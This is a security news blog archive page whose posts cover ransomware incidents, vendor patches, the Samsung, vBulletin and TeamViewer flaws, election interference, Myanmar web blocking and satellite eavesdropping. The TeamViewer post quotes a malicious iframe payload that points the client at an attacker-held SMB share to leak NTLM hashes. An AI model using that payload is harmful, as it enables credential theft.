Category Archives: Breaking News

City of Lafayette (Colorado) paid $45,000 ransom after ransowmare attack

The City of Lafayette, Colorado, USA, has been forced to pay $45,000 because they were unable to restore necessary files from backup.

On July 27th, the systems at the City of Lafayette, Colorado, were infected with ransomware, the malicious code impacted phone services, email, and online payment reservation systems.

The City did not immediately disclose the cause of the outage of its systems and invited the citizens to use 911 or an alternate number for emergency services.

Now the City of Lafayette admitted they were a victim of a ransomware attack that encrypted its systems and confirmed that opted to pay a $45,000 ransom to receive a decryption tool to recover its files.

“After a thorough examination of the situation and cost scenarios, and considering the potential for lengthy inconvenient service outages for residents, we determined that obtaining the decryption tool far outweighed the cost and time to rebuild data and systems,” City of Lafayette Mayor Jamie Harkins explained in a video.

The City did not disclose technical details of the hack either the family of ransomware that infected its systems, it only stated that it does not believe any data was stolen. The City also added that credit card data was not stored on its systems, anyway it invited residents and employees to monitor their bank accounts for suspicious activity.

“Financial data appears to be recoverable from unaffected backups. Personal credit card information was not compromised, as the City uses external PCI-certified payment gateways.” reads the announcement published by the City. “There is no evidence to suggest personal data was compromised, but out of an abundance of caution, residents and employees are advised to be vigilant to monitor accounts for suspicious activity.”

The City is going to notify individuals who have personal information stored on the City’s network.

The small amount of money requested by the attackers suggests that the attackers are not one of the major ransomware gangs, like Maze, REvil, or Clop, that usually asks for a higher ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, City of Lafayette)

The post City of Lafayette (Colorado) paid $45,000 ransom after ransowmare attack appeared first on Security Affairs.

Citrix fixed flaws in XenMobile that will be likely exploited soon

Citrix addressed multiple vulnerabilities in Citrix Endpoint Management (XenMobile) that can be exploited by an attacker to gain administrative privileges on affected systems.

The Citrix Endpoint Management (CEM), formerly XenMobile, is software that provides mobile device management (MDM) and mobile application management (MAM).

The vulnerabilities that impacted the Citrix XenMobile were tracked as CVE-2020-8208, CVE-2020-8209, CVE-2020-8210, CVE-2020-8211, and CVE-2020-8212. Citrix confirmed that these flaws could be chained to allow a remote unauthenticated attacker to gain administrative control of a Citrix Endpoint Management (CEM) server,

The impact of the issues depends on the specific version of the software. The vulnerabilities impacting XenMobile server 10.12 before RP2, 10.11 before RP4, 10.10 before RP6, and all versions before 10.9 RP5 have been rated as critical. For XenMobile Server versions 10.12 before RP3, 10.11 before RP6, 10.10 before RP6, and releases prior to 10.9 RP5, the issues have been rated medium or low.

“Today we posted a Security Bulletin covering a set of vulnerabilities in certain on-premises instances of Citrix Endpoint Management (CEM), often referred to as XenMobile Server.” reads the advisory published by Citrix.

“The latest rolling patches that need to be applied for versions 10.9, 10.10, 10.11, and 10.12 are available immediately. Any versions prior to 10.9.x must be upgraded to a supported version with the latest rolling patch.”

The company notified its customers on July 23 and shared details for the issues with the national CERTs around the world.

The company did not provide technical details on the addressed vulnerabilities but revealed that it pre-notified CERTs and customers on July 23. The company is urging users to upgrade their systems.

“We recommend these upgrades be made immediately. While there are no known exploits as of this writing, we do anticipate malicious actors will move quickly to exploit,” continues the advisory.

The flaws were reported by Andrey Medov of Positive Technologies, Glyn Wintle of Tradecraft, and Kristian Bremberg of Detectify.

Experts pointed out that the flaws aren’t trivial to exploit, in order to exploit the issue the attackers need to access target network.

Pierluigi Paganini

(SecurityAffairs – hacking, XenMobile)

The post Citrix fixed flaws in XenMobile that will be likely exploited soon appeared first on Security Affairs.

Microsoft August 2020 Patch Tuesday fixed actively exploited zero-days

Microsoft August 2020 Patch Tuesday updates addressed 120 vulnerabilities, including two zero-days that have been exploited in attacks.

Microsoft August 2020 Patch Tuesday updates have addressed 120 flaws, including two zero-day vulnerabilities that have been exploited in attacks in the wild.

The two issues are a Windows spoofing bug and a remote code execution flaw in Internet Explorer.

The Windows spoofing flaw, tracked as CVE-2020-1464 can be exploited by an attacker to bypass security features and load improperly signed files. The flaw is related to Windows incorrectly validating file signatures.

“A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files.” reads the advisory published by Microsoft.

“In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded.”

The flaw affects many Windows OSs, including Windows 7 and Windows Server 2008, for which the IT giant will not provide security updates because the reached the end-of-life.

Microsoft confirmed that threat actors are actively exploiting the issues in attacks against Windows systems but it did not provide technical details about the attacks.

The second zero-day addressed by Microsoft is tracked as CVE-2020-1380, it is a remote code execution issue that affects the scripting engine used by Internet Explorer. The flaw is related to the way the engine handles objects in memory, it could be exploited by tricking victims into visiting a malicious website, or by opening a malicious Office document, or through a malvertising attack.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system.”

The RCE vulnerability was discovered by security researchers at Kaspersky.

Microsoft also addressed other 15 critical vulnerabilities that impact Windows, the Edge and Internet Explorer browsers, Outlook, and the .NET framework. Most of the vulnerabilities are remote code execution issues.

Microsoft August 2020 Patch Tuesday also fixed over 100 vulnerabilities, rated as important, impacting Windows, Dynamics 365, Office, Outlook, SharePoint, and Visual Studio Code. These flaws can be exploited for remote code execution, privilege escalation, XSS attacks, DoS attacks, and to disclose information.

The full list of flaws addressed by Microsoft August 2020 Patch Tuesday is available here.

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft August 2020 Patch Tuesday)

The post Microsoft August 2020 Patch Tuesday fixed actively exploited zero-days appeared first on Security Affairs.

Adobe Acrobat and Reader affected by critical flaws

Adobe has released security updates to address twenty-six vulnerabilities in the Adobe Acrobat, Reader, and Lightroom products.

Adobe has released security updates to address tens of vulnerabilities in Adobe Acrobat, Reader, and Lightroom products.

Eleven out of twenty-six flaws are rated as ‘Critical’ because they could be exploited by attackers to remotely execute arbitrary code or bypass security features on vulnerable computers.

APSB20-48 Security updates available for Adobe Acrobat and Reader

Adobe has released security updates that address 25 vulnerabilities in Adobe Acrobat and Reader products, 11 flaws are rated as ‘Critical.’

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by the company.

Below the list of the addressed issues.

Vulnerability CategoryVulnerability ImpactSeverityCVE Number
Disclosure of Sensitive DataMemory LeakImportant   CVE-2020-9697
Security bypass Privilege Escalation ImportantCVE-2020-9714
Out-of-bounds writeArbitrary Code Execution         Critical CVE-2020-9693CVE-2020-9694
Security bypassSecurity feature bypassCritical CVE-2020-9696CVE-2020-9712
Stack exhaustionApplication denial-of-serviceImportant CVE-2020-9702CVE-2020-9703
Out-of-bounds readInformation disclosureImportant CVE-2020-9723CVE-2020-9705CVE-2020-9706CVE-2020-9707CVE-2020-9710CVE-2020-9716CVE-2020-9717CVE-2020-9718CVE-2020-9719CVE-2020-9720CVE-2020-9721
Buffer errorArbitrary Code Execution         Critical CVE-2020-9698CVE-2020-9699CVE-2020-9700CVE-2020-9701CVE-2020-9704
Use-after-free   Arbitrary Code Execution         Critical CVE-2020-9715CVE-2020-9722

APSB20-51 Security update available for Adobe Lightroom

Adobe has released a security update to address a DLL hijacking vulnerability in Adobe Lightroom that could be exploited by an attacker to execute commands with elevated privileges.

“Adobe has released updates for Adobe Lightroom Classic for Windows and macOS. This update addresses an important vulnerability. Successful exploitation could lead to privilege escalation in the context of the current user.” reads the advisory.

An attacker can exploit the flaw to get his malicious DLL being loaded at the launching of the software.

Vulnerability CategoryVulnerability ImpactSeverityCVE Numbers
Insecure Library LoadingPrivilege escalationImportantCVE-2020-9724

Adobe has released Lightroom Classic 9.3 to address the vulnerability.

Users of these products are recommended to upgrade to the latest versions as soon as possible.

Pierluigi Paganini

(SecurityAffairs – hacking, Adobe Acrobat)

The post Adobe Acrobat and Reader affected by critical flaws appeared first on Security Affairs.

Flaws in ‘Find My Mobile’ exposed Samsung phones to hack

A researcher found multiple flaws in Samsung’s Find My Mobile that could have been chained to perform various malicious activities on Samsung Galaxy Phones.

The security researcher Pedro Umbelino from Portugal-based cybersecurity services provider Char49 discovered multiple vulnerabilities in Samsung’s Find My Mobile that could have been chained to perform various malicious activities on Samsung Galaxy Phones.

“There are several vulnerabilities in the Find My Mobile package that can ultimately result in complete data loss for the smartphone user (factory reseting), as well as real time location tracking, phone call and message retrieving, phone lockout, phone unlock, etc. Every action that is possible for the user to perform using the web application that is passed to the device can be abused by a malicious application.” reads the report published by the security firm. “The code path to execute these actions involves several vulnerabilities being chained.”

The experts shared his findings at the DEF CON conference last week.

The “Find My Mobile” feature allows owners of Samsung devices to find their lost phones, it also allow to remotely lock a device, block access to Samsung Pay, and completely wipe the content of the device.

Char49 researcher found four vulnerabilities in Find My Mobile components that could have been exploited by a rogue app installed on the device that only requires access to the device’s SD card.

The access to the device’s SD card allows the app to trigger the first vulnerability in the attack chain, then create a file used by the attacker to intercept communications with backend servers.

Below the speech made by the experts last week at DEF CON 28SM hacking virtual conference.

The successful exploitation of the flaw would have allowed a malicious app to perform the same actions allowed by the Find My Mobile app, including force a factory reset, wipe data, locate the device, access to phone calls and messages, and lock and unlock the phone.

Char49 discovered the flaws more than a year ago, but Samsung addressed them in October 2019.

The expert explained that the exploit chain works on unpatched Samsung Galaxy S7, S8, and S9+ devices.

“This flaw, after setup, can be easily exploited and with severe implications for the user and with a potentially catastrophic impact: permanent denial of service via phone lock, complete data loss with factory reset (sdcard included), serious privacy implication via IMEI and location tracking as well as call and SMS log access,” concludes the report.

“The [Find My Mobile] application should not have arbitrary components publicly available and in an exported state. If absolutely necessary, for example if other packages call these components, then they should be protected with proper permissions. Testing code that relies on the existence of files in public places should be eliminated.”

Pierluigi Paganini

(SecurityAffairs – hacking, Samsung Find My Mobile)

The post Flaws in ‘Find My Mobile’ exposed Samsung phones to hack appeared first on Security Affairs.

Avaddon ransomware operators have launched their data leak site

Avaddon ransomware operators, like other cybercrime groups, decided to launch a data leak site where publish data of victims who refuse to pay a ransom demand.

Avaddon ransomware operators announced the launch of their data leak site where they will publish the data stolen from the victims who do not pay a ransom demand.

The first group to adopt this strategy was the Maze ransomware gang in December 2019, since then other crews adopted the same stratefy, including REvil, Nefilim, and Netwalker.

The threat of exposing the victim’s sensitive data is used by the gang to force them into paying a ransom.

Cybersecurity intelligence firm Kela was the first to report that the Avaddon ransomware operators have announced on a Russian-speaking hacker forum their new data leak site.

Source BleepingComputer

The hackers have already published on the leak site 3.5MB of documents stolen from a construction company.

Let’s wait for new entries on the leak site!

Pierluigi Paganini

(SecurityAffairs – hacking, Avaddon)

The post Avaddon ransomware operators have launched their data leak site appeared first on Security Affairs.

Researcher discloses exploit code for a vBulletin zero-day

A researcher published details and proof-of-concept exploit code for a zero-day RCE vulnerability in the popular forum CMS vBulletin.

The researcher Amir Etemadieh has published technical details and proof-of-concept exploit code for a zero-day remote code execution vulnerability in vBulletin, the popular forum software.

The new vulnerability is a bypass for a the security patch released by a vBulletin for the CVE-2019-16759 flaw, disclosed in September 2019.

The previous vulnerability could be exploited remotely by an unauthenticated attacker. The PoC exploit published by the hacker works on vBulletin versions 5.0.0 till the latest 5.5.4.

The flaw resides in the way an internal widget file of the forum software package accepts configurations via the URL parameters. The expert discovered that the package fails to validate the parameters, an attacker could exploit it to inject commands and remotely execute code on the vulnerable install.

The CVE-2019-16759 flaw was publicly disclosed on September 24, 2019, the maintainer of the vBulletin CMS released the security patch on September, 25.

Now the researcher Amir Etemadieh explained that the patch initially released did no completely fix the issue.

“Today, we’re going to talk about how the patch that was supplied for the vulnerability was inadequate in blocking exploitation, show how to bypass the resulting fix, and releasing a bash one-liner resulting in remote code execution in the latest vBulletin software.” reads a blog post published by Etemadieh.

The experts found a trivial way to bypass the patch, it released three three proof-of-concept exploits in Bash, Python, and Ruby

Etemadieh did not report the issue to the vBulletin team before the public disclosure of the flaw.

The exploit code is rapidly circulating on social media and inside hacking forums, for this reason, experts fear that threat actors will start using it in massive attacks.

The vBulletin team has already released a security patch to address this new zero-day vulnerability, anyway forum owners can also apply the following short term fix:

  1. Go to the vBulletin administrator control panel.
  2. Click “Settings” in the menu on the left, then “Options” in the dropdown.
  3. Choose “General Settings” and then click “Edit Settings”
  4. Look for “Disable PHP, Static HTML, and Ad Module rendering”, Set to “Yes”
  5. Click “Save”

At the time of publishing, at least one vBulletin-based forum has been hacked using this new zero-day, it is the site of the popular DEF CON security conference.

Pierluigi Paganini

(SecurityAffairs – hacking, vBulletin)

The post Researcher discloses exploit code for a vBulletin zero-day appeared first on Security Affairs.

TeamViewer flaw can allow hackers to steal System password

A severe vulnerability impacting TeamViewer for Windows, tracked as CVE 2020-13699, could be exploited by remote attackers to steal the system password.

TeamViewer has recently addressed a high-risk vulnerability (CVE 2020-13699), that could be exploited by remote attackers to steal system password and potentially compromise it.

TeamViewer is a popular software application for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers

The vulnerability, classified as an “Unquoted URI handler”, could be triggered by tricking the victims into visiting a malicious web site.

The vulnerability was discovered by the researcher Jeffrey Hofmann from Praetorian, it resides in the way TeamViewer quotes its custom URI handlers. The expert discovered that the issue could allow an attacker to force the software to relay an NTLM authentication request to the attacker’s system.

The issue in the TeamViewer’s URI scheme allows a web page crafted by the attack to trick the application installed on the victim’s system into initiating a connection to the attacker-owned remote SMB share.

This means that the SMB authentication process will leak the system’s username, and NTLMv2 hashed version of the password to the attackers.

The attacker could embed a malicious iframe on a website and then trick victims into visiting that maliciously URL. Upon clicking the link shared with the victims, TeamViewer will automatically launch its Windows desktop client and open a remote SMB share.

“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play \\attacker-IP\share\') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw.

“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

The TeamViewer project has fixed the issue by quoting the parameters passed by the affected URI handlers.

The vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. TeamViewer released the version 15.8.3 to address the issue and users are recommended to use it.

Such kind of issues is very dangerous because of the popularity of the software that is used by millions of users.

At the time of addressing the issue, the TeamViewer team is not aware of attacks in the wild exploiting the issue.

Pierluigi Paganini

(SecurityAffairs – hacking, TeamViewer)

The post TeamViewer flaw can allow hackers to steal System password appeared first on Security Affairs.

Nefilim ransomware operators claim to have hacked the SPIE group

Nefilim ransomware operators allegedly targeted the SPIE group, an independent European leader in multi-technical services.

Researchers from threat intelligence firm Cyble reported that Nefilim ransomware operators allegedly hacked The SPIE Group, an independent European leader in multi-technical services.

The number of ransomware attacks continues to increase, hackers also steal victims’ data and threaten them to release the stolen info if they don’t pay the ransom.

During darkweb and deepweb monitoring, the Cyble Research Team discovered a post from Nefilim ransomware operators in which they claimed to have breached The SPIE Group.

Nefilim ransomware SPIE group

The ransomware gang also revealed to have stolen the company’s sensitive data.

The SPIE Group provides multi-technical services in the areas of energy and communications, it has more than 47,200 employees and in 2019 it reported consolidated revenues of €6.9 billion and consolidated EBITA of €416 million.

Nefilim ransomware operators also released the first batch of file threatens to release other documents. Cyble experts analyzed the material, the first lot of data contains around 11.5 GB.

“The data leak seems to consist of corporate operational documents which include the company’s telecom services contracts, dissolution legal documents, power of attorney documents, infrastructure group reconstructions contracts, and much more.” reported Cyble.

The Nefilim ransomware operators released a total of 65,042 files contained in 18,551 data folders.

Nefilim ransomware operators continue to be very active in this period, recently the group targeted the Dussmann group, the German largest private multi-service provider and Orange S.A., one of the largest mobile networks based in France.

Below a list of tips provided by Cyble to prevent ransomware attacks:

  • Never click on unverified/unidentified links
  • Do not open untrusted email attachments
  • Only download from sites you trust
  • Never use unfamiliar USBs
  • Use security software and keep it updated
  • Backup your data periodically
  • Isolate the infected system from the network
  • Use mail server content scanning and filtering
  • Never pay the ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, SPIE group)

The post Nefilim ransomware operators claim to have hacked the SPIE group appeared first on Security Affairs.

NCSC Director warns of interference on elections tied to Russia, China, Iran

The Director of the U.S. National Counterintelligence and Security Center (NCSC) shared info on attempts of influence 2020 U.S. elections.

The Director of the U.S. National Counterintelligence and Security Center (NCSC) William Evanina shared information on ongoing operations aimed at influencing the 2020 U.S. elections.

“Many foreign actors have a preference for who wins the election, which they express through a range of overt and private statements; covert influence efforts are rarer. We are primarily concerned about the ongoing and potential activity by China, Russia, and Iran” reads the press release published by the Office of the Director of the National Intelligence.

Evanina linked the efforts to Russia, China, and Iran, he explained, for example, that Russian actors are supporting President Trump’s candidacy with a coordinated effort on both Russian television and media.

According to US intelligence, Russia is carrying out campaigns to denigrate former Vice President Biden that is considered hostile by the Kremlin.

We assess that Russia is using a range of measures to primarily denigrate former Vice President Biden and what it sees as an anti-Russia “establishment.” This is consistent with Moscow’s public criticism of him when he was Vice President for his role in the Obama Administration’s policies on Ukraine and its support for the anti-Putin opposition inside Russia.” said NCSC’s Director. “For example, pro-Russia Ukrainian parliamentarian Andriy Derkach is spreading claims about corruption – including through publicizing leaked phone calls – to undermine former Vice President Biden’s candidacy and the Democratic Party. Some Kremlin-linked actors are also seeking to boost President Trump’s candidacy on social media and Russian television.”

Iran is mainly operating to undermine U.S. democratic institutions and to divide the country ahead of the forthcoming 2020 elections. Iran-linked actors are spreading disinformation on social media and pushing anti-U.S. content.

We assess that Iran seeks to undermine U.S. democratic institutions, President Trump, and to divide the country in advance of the 2020 elections. Iran’s efforts along these lines probably will focus on on-line influence, such as spreading disinformation on social media and recirculating anti-U.S. content.” continues the statement. “Tehran’s motivation to conduct such activities is, in part, driven by a perception that President Trump’s reelection would result in a continuation of U.S. pressure on Iran in an effort to foment regime change.”

China wants that President Trump will lose the presidential elections since Beijing considers him unpredictable.

“We assess that China prefers that President Trump – whom Beijing sees as unpredictable – does not win reelection. China has been expanding its influence efforts ahead of November 2020 to shape the policy environment in the United States, pressure political figures it views as opposed to China’s interests, and deflect and counter criticism of China. Although China will continue to weigh the risks and benefits of aggressive action, its public rhetoric over the past few months has grown increasingly critical of the current Administration’s COVID-19 response, closure of China’s Houston Consulate, and actions on other issues.” continues the statement. “For example, it has harshly criticized the Administration’s statements and actions on Hong Kong, TikTok, the legal status of the South China Sea, and China’s efforts to dominate the 5G market. Beijing recognizes that all of these efforts might affect the presidential race.”

Evanina warns that foreign states will continue to use covert and overt influence actions to influence the Presidential elections. The Directors also warns of the attempt of compromising the election infrastructure for multiple purposes, including interfering with the voting process, stealing sensitive data, or calling into question the validity of the election results.

In July, Evanina published another analysis of foreign threats to the U.S. 2020 presidential election warning of coordinated efforts of foreign nation-sponsored actors to interfere with elections through traditional and social media.

“At the most basic level, we encourage Americans to consume information with a critical eye, check out sources before reposting or spreading messages, practice good cyber hygiene and media literacy, and report suspicious election-related activity to authorities,” he said.

Pierluigi Paganini

(SecurityAffairs – hacking, Presidential elections)

The post NCSC Director warns of interference on elections tied to Russia, China, Iran appeared first on Security Affairs.


The list of sites blocked in MYANMAR includes many websites that did not fall under the categories adult content or fake news

Original post at:

In March 2020, The Ministry of Telecommunications (MoTC) issued a directive to all operators in Myanmar with a secret list of 230 sites to be blocked due to the nature of the content; adult content and fake news. The order was based on article 77 of the Telecommunications Law and the MoTC directive stipulated that the list of blocked sites was confidential and could not be made public. If an operator publicized the list, it would be in violation of the directive and local law. However, the block list included many websites that did not fall under the categories “adult content or fake news”. Several legitimate and acknowledged media related to minority ethnic groups and news focusing on the Rakhine state were found on the list.

Telenor Myanmar – an attempt to resistance

There are four operators in Myanmar: state-owned Myanma Posts and Telecommunications (MPT), Qatar based Ooredoo, military-aligned Mytel, and privately owned Telenor Myanmar. Telenor initially challenged the blocking, and on March 23, Telenor Myanmar’s spokesperson said:

“Telenor Myanmar has not complied with the request to block sites in the category of ‘fake news’ as it has not been able to establish sufficient legal basis for this part of the request. Telenor Myanmar believes in open communication and regrets if any inconvenience is caused to the customers”

However, “dialogue with the authorities made it clear that non-compliance with the directive would have implications on the company’s ability to service the public” says Cathrine Stang Lund, Acting VP Communications at the Telenor Group, Singapore. In April 2020, Telenor complied with the directive and blocked ALL sites on the block list. In a press release from April 22, Telenor stated:

“Telenor has assessed that the risk involved in not following the directive as regards fake news is likely to have wider implications in terms of servicing the public. Hence, the remaining sites have been blocked bringing the total count to 230.”

Five months later, several legitimate and trusted news sites such as Mandalay In-Depth NewsKarenNews and Voice of Myanmar, remain blocked in Myanmar.

How is the blocking implemented?

In collaboration with the civil society organization Myanmar ICT for Development Organization (MIDO), Qurium has investigated the blocking methods implemented by Telenor Myanmar and the state-owned operator Myanma Posts and Telecommunications (MPT).

During the joint research with MIDO, traffic was recorded from Telenor (AS133385) and MPT inside Myanmar (AS9988) to a number of blocked legitimate news sites that had been classified as “fake news”. Our findings show that both Telenor and MPT block websites using DNS tampering. MPT is ignoring the DNS requests to the blocked domains, while Telenor is redirecting them to an IP address outside of the country.

Telenor – redirects blocked users to anonymous foreign server

.pw domains are inexpensive and often used by spammers.

The blocking mechanism of Telenor is curious and requires a bit of attention. Telenor redirects all users attempting to access a blocked domain to an inexpensive VPS outside of Telenor’s own infrastructure under a non-Telenor domain. The VPS (IP address 167.172.4{.}60) is hosted in Digital Ocean, Singapore under the domain, a domain purchased in late March 2020 for less than 2 USD.

According to Stang-Lund at Telenor Myanar, the reason for using an external domain hosted in Singapore as landing page is to protect the users. She says “this (decision) is based on a holistic evaluation, including privacy considerations, as user data on attempted access is outside of Myanmar’s jurisdiction”.

However, when redirecting blocked users to a Digital Ocean VPS in Singapore (outside of Telenor’s infrastructure), Telenor puts the readers in greater risk as the traffic leaves Telenor’s control and travels via several unknown operators. Qurium has requested a clarification from Telenor Myanmar on why Telenor did not place the block page within its own infrastructure (but outside of Myanmar’s jurisdiction), but have not received an answer.

Telenor’s anonymous block page under the obscure domain

The block page provides the user a brief message in Burmese and English. The message does neither indicate that it is coming from Telenor nor provide means to appeal the blocking decision.

“Sorry, this URL is not available from Myanmar. You have tried to access a web page which has been blocked as per directive received from the Ministry of Transport and Communications Myanmar..”

Cathrine Stang-Lund explains “Since the authorities have not provided a complaint or appeal mechanism, nor contact details, Telenor Myanmar is unfortunately unable to provide that on the landing page. Any appeal should be made to the authorities.” Adding this information to the block page would increase the transparency and trustworthiness of Telenor Myanmar.

The block page uses the domain “” registered the 26th of March 2020 with a free Let’s encrypt certificate.

 Registry Domain ID: D180106494-CNIC
 Registrar WHOIS Server:
 Registrar URL:
 Updated Date: 2020-03-31T03:01:23.0Z
 Creation Date: 2020-03-26T02:55:00.0Z
 Registry Expiry Date: 2021-03-26T23:59:59.0Z
 Registrar: NameSilo, LLC

To confirm the domain ownership, Qurium tried to reach the domain owner via an online form provided by A month later, no response has been provided.

The mail account, published as contact details in DNS, bounces all incoming mails.

Blocking without accountability

There are several aspects of the Internet blocking in Myanmar that raise questions. In this section we have collected the open questions that still are unanswered.

  1. Why does not the MoTC release a public list of all blocked sites? How come that the block list is secret?
  2. Why does not MoTC provide a complaint or appeal mechanism, or at least contact details for questions regarding the blocking?
  3. Why did Telenor decide to use a VPS hosted in a third party provider to host the blocking page instead of using a server within the Telenor infrastructure?
  4. Why is this VPS hosted outside Myanmar, implying that visitors to blocked sites are redirected to a server outside of the jurisdiction of Myanmar?
  5. Why did Telenor register the domain without a proper contact information? Blocked websites have no means to identify and contact the organization responsible of the blocking and exercise their rights to object.
  6. Internet blocking is normally requested by the Ministry of Transport and Communication, but in order to force operators to implement the blocking, a legal decree is required. Did the operators receive such a decree from the Ministry of Justice of Myanmar?

Circumvention of Internet blocking

To circumvent Internet blocking of legitimate news sites, human rights organizations and LGBTQI initiatives, Qurium has developed the mirroring service Bifrost. Bifrost creates live-mirrors of WordPress sites, and pushes the content to large cloud storage services like Google or Amazon, which are too expensive for governments to block. In the case of Myanmar, Qurium has chosen to mirror In-Depth News Mandalay, a legitimate local news site focusing on the Mandalay region. The news site was blocked in March 2020 under the category “fake news”, after being openly critical against military violence and government corruption.

Further reading – OONI research report

For further reading on current situation of Internet blocking in Myanmar, we recommend the article “Myanmar blocks websites amid COVID19” published by OONI in May 2020.

About the author:

About the authors – Contacts:

Forensic report: Tord Lundström, Qurium Media Foundation < >

Media: Clara Zid, Qurium Media Foundation < >

Pierluigi Paganini

(SecurityAffairs – hacking, Myanmar)


Spying on satellite internet comms with a $300 listening station

An attacker could use $300 worth of off-the-shelf equipment to eavesdrop and intercept signals from satellite internet communications.

The academic researcher James Pavur, speaking at Black Hat 2020 hacking conference, explained that satellite internet communications are susceptible to eavesdropping and signal interception. Attackers could use cheap equipment like a basic home-television gear that goes from $300 to spy on the internet traffic for high-value targets.

When a satellite ISP attempt to establish an internet connection for a customer, it beams that customer’s signals up to a geostationary satellite using a narrow communications channel. Then the signal is sent back down to a terrestrial receiving station and routed to the internet.

The response signals are sent back using the same channel, the transmission downlink between the satellite and the user will be a broadcast transmission that contains the larger volume of customers’ traffic simultaneously in order to optimize the costs.

“A critical difference is that we’re going to send [downstream signals] in a really wide beam, because we want to cover as many customers as possible, and satellites are very expensive,” explained Pavur. “So radio waves carrying a response to a Google search will reach our customer in the middle of the Atlantic Ocean; but they will also hit an attacker’s dish in, say, Ghana.”

Pavur explained that nation-state actors could use very expensive equipment in installed ground stations to eavesdrop on satellite communications. However, he demonstrated that it is possible to spy on satellite internet connections using basic home-television consumer equipment.

The boffin used a common flat-panel satellite dish and an off-the-shelf PCIe satellite tuner card to realize the listening station. Pavur pointed out that professional PCIe tuner cards cost between $200 and $300, but it is possible to use less reliable and cheaper versions that go for $50/$80.

satellite internet comms equipment

The researchers explained that an attacker could spy on specific satellites, whose locations are public, by pointing them with the dish. Then they could use software like EPS Pro to discover internet feeds.

“We’re going to point our satellite dish at a spot in the sky that we know has a satellite, and we’re going to scan the Ku band of the radio spectrum to find signals against the background noise,” Pavur explained. “The way we’ll identify channels is by looking for distinct humps in the radio spectrum; because they stick out against the background noise, we can guess that there’s something going on there. We’ll tell our card tune to this one, and treat it as a digital video broadcasting for satellite feed. After a few seconds we get a lock on that feed, meaning we successfully found a connected satellite.”

Once discovered a feed the attacker have to record it and analyze the collected data in order to determine whether the traffic is related to an Internet connection or a TV feed. Pavur explained that this check is quite simple, he just looked for the presence of the string HTTP which is associated with Internet traffic and not in a TV feed.

Once the attacker has identified a satellite internet connection he can record it and then parse it for valuable information. The feed are transmitted in MPEG video streaming format or the generic stream encapsulation (GSE) protocols.

MPEG is easy to parse using commonly available tools like Wireshark, while GSE leverage more complicated modulations that make it hard for cheap hardware to parse the stream.

Pavur and his colleagues noticed that most of the traffic they collected resulted in corrupted files, for this reason, they developed a tool called GC Extract to extract IP data out of a corrupted GSE recording.

“What this means is that an attacker who’s listening to your satellite signal gets to see what your internet service provider would expect to see: Every packet that comes to your modem, every BitTorrent you download, every website you visit,” Pavur said. “But it gets even worse if we look at enterprise customers, because a lot of them were operating what was essentially a corporate land network over the satellite feeds. For example, imagine a cruise line that has a bunch of Windows devices aboard it ships. This Windows local area network with all that internal LDAP traffic and SDP traffic will be broadcast over the satellite link, giving an eavesdropper perspective from behind the firewall.”

Pavel explained that attackers could also collect information even when the traffic is encrypted. The analysis of DNS could reveal the user’s Internet browsing history while the analysis of TLS certificates could allow fingerprinting the servers the user connected.

The researcher presented some real cases in which he was able to access data sent on satellite internet connections.

The researchers and his Oxford team disclosed their findings to the test victims and ISPs.

The Federal Bureau of Investigation released a private threat-intelligence notification following the presentation of the results of the research.

“However, recently conducted research discovered man-in-the-middle attacks against maritime VSAT signals can be conducted with less than $400 of widely available television equipment, a presenting opportunities to a wider range of threat actors to potentially gain visibility into sensitive information.” reads the notification published by the FBI.

“The internet is a weird web with devices and systems that are connected in ways that you can never predict, you might connect to a secure Wi-Fi hotspot or a cell tower, but the next hop could be a satellite link or wiretapped Ethernet cable,” Pavur concluded. “Having the right, the ability and the knowledge to encrypt your own data, and to choose to do that, is critical to protecting against this class of attack, whatever domain you think about it in.”

The Presentation Slides are available here:

Pierluigi Paganini

(SecurityAffairs – hacking, satellite)

The post Spying on satellite internet comms with a $300 listening station appeared first on Security Affairs.

Security Affairs newsletter Round 276

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

A critical flaw in wpDiscuz WordPress plugin lets hackers take over hosting account
FBI issued a flash alert about Netwalker ransomware attacks
Garmin allegedly paid for a decryptor for WastedLocker ransomware
QNAP urges users to update Malware Remover after QSnatch joint alert
Belarussian authorities arrested GandCrab ransomware distributor
Ghostwriter disinformation campaign aimed at discrediting NATO
Hackers stole €1.2m worth of cryptocurrency from 2gether
Havenly discloses data breach, 1.3M accounts available online
Reading the 2020 Cost of a Data Breach Report
Maze Ransomware operators published data from LG and Xerox
NetWalker ransomware operators have made $25 million since March 2020
UberEats data leaked on the dark web
US govt agencies share details of the China-linked espionage malware Taidoor
Cyber Defense Magazine – August 2020 has arrived. Enjoy it!
Exclusive: TIMs Red Team Research finds 4 zero-days in WOWZA Streaming Engine product
Flaw in popular NodeJS ‘express-fileupload module allows DoS attacks and code injection
Hacker leaks passwords for 900+ Pulse Secure VPN enterprise servers
NSA releases a guide to reduce location tracking risks
FBI is warning of cyber attacks against Windows 7 systems that reached end-of-life
Hackers can abuse Microsoft Teams updater to deliver malicious payloads
Netwalker ransomware operators claim to have stolen data from Forsee Power
Did Maze ransomware operators steal 10 GB of data from Canon?
Google Threat Analysis Group took down ten influence operations in Q2 2020
Intel investigates security breach after the leak of 20GB of internal documents
Reddit massive hack: hackers defaced channels with pro-Trump messages
FBI warns of Iran-linked hackers attempting to exploit F5 BIG-IP flaw
